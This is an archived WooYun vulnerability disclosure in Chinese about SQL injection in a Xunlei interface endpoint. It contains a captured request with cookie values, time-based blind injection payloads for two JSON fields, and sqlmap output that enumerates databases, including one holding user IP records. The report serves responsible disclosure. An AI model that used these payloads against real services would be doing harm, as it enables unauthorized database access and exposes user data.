乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-21: 细节已通知厂商并且等待厂商处理中 2016-05-23: 厂商已经确认,细节仅向厂商公开 2016-06-02: 细节向核心白帽子及相关领域专家公开 2016-06-12: 细节向普通白帽子公开 2016-06-22: 细节向实习白帽子公开 2016-07-07: 细节向公众公开
rt必须吐槽一下迅雷src的页面怎么那么简洁完全不知道怎么在那提交
抓的post包
POST /location/upload_peerinfo HTTP/1.1Host: interface.xl9.xunlei.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Cookie: sessionid=CC824A20602118045BF9B8150499AD86; userid=50947382; peerid=50E549E88890F5GQ; client=pc; v=7.10.33.358Connection: keep-aliveCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 74{"cpu":"","devicename":"ZHONGWEN","devicetype":"pc","imei":"","memory":""}
devicename\devicetype 都是注入点
---Parameter: JSON devicename ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: {"cpu":"","devicename":"ZHONGWEN' AND (SELECT * FROM (SELECT(SLEEP(5)))DEhT) AND 'AgGq'='AgGq","devicetype":"pc","imei":"","memory":""}Parameter: JSON devicetype ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: {"cpu":"","devicename":"ZHONGWEN","devicetype":"pc' AND (SELECT * FROM (SELECT(SLEEP(5)))KNUs) AND 'HTgX'='HTgX","imei":"","memory":""}---
available databases [6]:[*] `xl9\x81\x81omplain`[*] information_schema[*] x[*] xl9_location[*] xl9_tracer[*] xl9_user_ip_loc
[15:55:53] [INFO] fetching tables for database: 'xl9_user_ip_loc'[15:55:53] [INFO] fetching number of tables for database 'xl9_user_ip_loc'[15:55:53] [INFO] resumed: 257
xl9_user_ip_loc 这个库挺大的 都是用户记录的ip吧 。
过滤
危害等级:高
漏洞Rank:18
确认时间:2016-05-23 10:13
感谢您的反馈,漏洞可直接发送到 。
暂无
